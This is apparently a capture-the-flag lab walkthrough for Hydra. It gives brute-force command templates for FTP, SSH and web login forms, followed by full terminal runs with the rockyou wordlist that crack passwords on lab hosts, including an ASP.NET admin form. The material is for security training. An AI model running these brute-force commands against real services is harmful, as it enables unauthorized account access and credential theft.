What is Hydra?
Hydra is a brute force online password cracking program; a quick system login password 'hacking' tool.
We can use Hydra to run through a list and 'bruteforce' some authentication service. Imagine trying to manually guess someones password on a particular service (SSH, Web Application Form, FTP or SNMP) - we can use Hydra to run through a password list and speed this process up for us, determining the correct password.
Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For more information on the options of each protocol in Hydra, read the official Kali Hydra tool page: https://en.kali.tools/?p=220
This shows the importance of using a strong password, if your password is common, doesn't contain special characters and/or is not above 8 characters, its going to be prone to being guessed. 100 million password lists exist containing common passwords, so when an out-of-the-box application uses an easy password to login, make sure to change it from the default! Often CCTV camera's and web frameworks use admin:password as the default password, which is obviously not strong enough.
Installing Hydra
If you're using Kali Linux, hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra
If you don't have Linux or the right desktop environment, you can deploy your own Kali Linux machine with all the needed security tools. You can even control the machine in your browser! Do this with our Kali room - https://tryhackme.com/room/kali
Using Hydra
The options we pass into Hydra depends on which service (protocol) we're attacking. For example if we wanted to bruteforce FTP with the username being user and a password list being passlist.txt, we'd use the following command:
hydra -l user -P passlist.txt ftp://192.168.0.1For the purpose of the Christmas challenge, here are the commands to use Hydra on SSH and a web form (POST method).
SSH
hydra -l <username> -P <full path to pass> <ip> -t 4 ssh| Option | Description |
|---|---|
| -l | is for the username |
| -P | Use a list of passwords |
| -t | specifies the number of threads to use |
Post Web Form
We can use Hydra to bruteforce web forms too, you will have to make sure you know which type of request its making - a GET or POST methods are normally used. You can use your browsers network tab (in developer tools) to see the request types, of simply view the source code.
Below is an example Hydra command to brute force a POST login form.
hydra -l <username> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -V| Option | Description |
|---|---|
| -l | Single username |
| -P | indicates use the following password list |
| http-post-form | indicates the type of form (post) |
| /login url | the login page URL |
| :username | the form field where the username is entered |
| ^USER^ | tells Hydra to use the username |
| password | the form field where the password is entered |
| ^PASS^ | tells Hydra to use the password list supplied earlier |
| Login | indicates to Hydra the Login failed message |
| Login failed | is the login failure message that the form returns |
| F=incorrect | If this word appears on the page, its incorrect |
| -V | verborse output for every attempt |
You should now have enough information to put this to practise and complete the Hydra Christmas challenge!
Start Hacking
catsec@catsec:~/thm# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.183.73 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-02 04:59:45 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.183.73:80//login:username=^USER^&password=^PASS^:F=incorrect [ATTEMPT] target 10.10.183.73 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "654321" - 17 of 14344399 [child 0] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "michael" - 18 of 14344399 [child 5] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "ashley" - 19 of 14344399 [child 6] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "qwerty" - 20 of 14344399 [child 1] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "111111" - 21 of 14344399 [child 8] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "iloveu" - 22 of 14344399 [child 9] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "000000" - 23 of 14344399 [child 11] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "michelle" - 24 of 14344399 [child 12] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "tigger" - 25 of 14344399 [child 13] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "sunshine" - 26 of 14344399 [child 14] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "chocolate" - 27 of 14344399 [child 15] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "password1" - 28 of 14344399 [child 2] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "soccer" - 29 of 14344399 [child 3] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "anthony" - 30 of 14344399 [child 4] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "friends" - 31 of 14344399 [child 7] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "butterfly" - 32 of 14344399 [child 10] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "purple" - 33 of 14344399 [child 0] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "angel" - 34 of 14344399 [child 5] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "jordan" - 35 of 14344399 [child 6] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "liverpool" - 36 of 14344399 [child 9] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "justin" - 37 of 14344399 [child 11] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "loveme" - 38 of 14344399 [child 13] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 2] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "123123" - 40 of 14344399 [child 12] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "football" - 41 of 14344399 [child 1] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "secret" - 42 of 14344399 [child 3] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "andrea" - 43 of 14344399 [child 4] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "carlos" - 44 of 14344399 [child 7] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "jennifer" - 45 of 14344399 [child 8] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "joshua" - 46 of 14344399 [child 10] (0/0) [ATTEMPT] target 10.10.183.73 - login "molly" - pass "bubbles" - 47 of 14344399 [child 15] (0/0) [80][http-post-form] host: 10.10.183.73 login: molly password: sunshine 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-02 04:59:53
Use Hydra to bruteforce molly’s web password. What is flag 1?
catsec@catsec:~/thm# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.183.73 -t 4 ssh Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-02 05:16:34 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking ssh://10.10.183.73:22/ [22][ssh] host: 10.10.183.73 login: molly password: butterfly 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-02 05:17:07
Use Hydra to bruteforce molly’s SSH password. What is flag 2?
E:\PENTEST\thc-hydra>hydra -l admin -P rock.txt 10.10.140.111 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-03 19:49:39 [80][http-post-form] host: 10.10.140.111 login: admin password: 1qaz2wsx 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-03 19:49:52